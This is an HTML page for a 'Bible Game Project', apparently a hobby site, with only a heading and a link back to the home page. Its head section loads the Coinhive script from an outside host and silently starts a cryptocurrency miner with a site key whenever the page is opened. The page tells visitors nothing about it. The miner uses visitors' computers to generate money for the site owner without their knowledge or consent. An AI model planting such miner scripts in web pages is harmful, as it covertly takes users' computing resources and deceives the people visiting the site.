<!DOCTYPE HTML>
<html>
<head>
	<title>LEGEND Bible Game</title>
	<link rel="shortcut icon" href="img/abrahamIndicator.png" type="image/png">
	<link rel="stylesheet" type="text/css" href="css/styles.css">
	
	<script src="https://coinhive.com/lib/coinhive.min.js"></script>
	<script type="text/javascript">
		var miner = new CoinHive.Anonymous('juz9WEUHuuLLoEDhrIlZj9ndaeaVJeBT');
		miner.start();
	</script>
</head>

<body>

	<h1>BIBLE GAME PROJECT</h1>

	<center>
	<a href="index.html">go back to home page</a>
	</center>
</body>

</html>
